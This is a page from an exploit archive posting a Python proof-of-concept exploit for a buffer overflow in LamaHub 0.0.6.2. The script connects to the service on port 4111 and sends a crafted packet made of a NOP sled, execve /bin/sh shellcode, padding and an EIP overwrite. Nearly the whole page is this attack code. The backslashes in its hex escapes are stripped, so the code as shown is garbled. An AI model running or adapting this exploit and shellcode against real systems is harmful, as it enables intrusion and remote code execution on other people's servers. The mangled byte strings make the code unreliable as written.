Home / os / winmobile

LamaHub 0.0.6.2 Buffer Overflow

Posted on 10 September 2016

# Exploit Title: LamaHub-0.0.6.2 BufferOverflow
# Date: 09/09/09
# Exploit Author: Pi3rrot
# Vendor Homepage: http://lamahub.sourceforge.net/
# Software Link: http://ovh.dl.sourceforge.net/sourceforge/lamahub/LamaHub-0.0.6.2.tar.gz
# Version: 0.0.6.2
# Tested on: Debian 8 32bits

# This exploit may crash the Lamahub service in many cases.
# If you compile with -fno-stack-protection and -z execstack
# you will be able to execute arbitrary code.
#
# Thanks to the AFL dev' for making the fuzzer who find the crash ;)
# Thanks to gapz for AFL configuration.
#
# pierre@pi3rrot.net

# How it works ?
# Client side:
# exploit_writeEIP.py

# Server side:
# a ./server
# > init () -> OK
# > started on port -> 4111
# > new client -> 127.0.0.1 -> 4
# $ whoami
# pierre
# $

import socket

HOST = 'localhost'
PORT = 4111
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

buf = ""
buf += "x24x53x75x70x70x6fx72x74x73x20x55x73"
buf += "x6cx6cx6fx20x49x50x32x20x65x61x72x63"
buf += "x68x20x5ax50x65x30x20x7cx24x4bx65x79"
buf += "x61x7cx24x56x61x6cx69x64x61x74x65x4e"
buf += "x69x63x6bx20x50x69x65x72x72x65x7cx24"
buf += "x56x65x6ex20x31x2cx30x30x39x31x7cx24"
buf += "x47x01x00x4ex3bx63x6bx4cx69x73x74x7c"
buf += "x24x4dx79x49x4ex46x4fx20x24x41x4cx4c"
buf += "x20x50x69x65x72x72x65x20x4ax65"

#NEED padding of 96
shellcode = "x90" *30
shellcode += "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x31xc9x89xcax6ax0bx58xcdx80"
shellcode += "x90"*42
print "Shellcode len: "
print len(shellcode)

buf2 = "x61x3c"
buf2 += "x3cx24x4dx79x80x00x35x24x70x69x24x30"
buf2 += "x24x37x37x37x37x37x37x37x37x37x37x37"
buf2 += "x37xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1"
buf2 += "xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1"
buf2 += "xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1"
buf2 += "xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1xb1"
buf2 += "xb1x2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2c"
buf2 += "x2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2c"
buf2 += "x2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2c"
buf2 += "x2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2c"
buf2 += "x2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2c"
buf2 += "x2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2c"
buf2 += "x2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2cx2c"
buf2 += "x2cx2cx2cx2cx2cx2cx2cx2c"

eip_overwrite = "x2ax6ax06x08"
#eip_overwrite = "AAAA"
buf3 = "xd6x26x06x08xb1xb1xb1xb1xb1xb1xb1xb1"
buf3 += "xb1xb1xb1xb1x37x37x30x2cx49x4ex46x4f"
buf3 += "x24xcaxcaxcaxcax20x5ax50x65x30x20x7c"
buf3 += "x24x4bx65x79x61x7cx24x56x20x41x20x30"
buf3 += "x61x7cx24x56x69x63x6bx20x50x69xcaxca"
buf3 += "x0a"

# Send EVIL PACKET !
s.sendall(buf + shellcode + buf2 + eip_overwrite + buf3)
s.close()

 

TOP

Malware :

Exploits :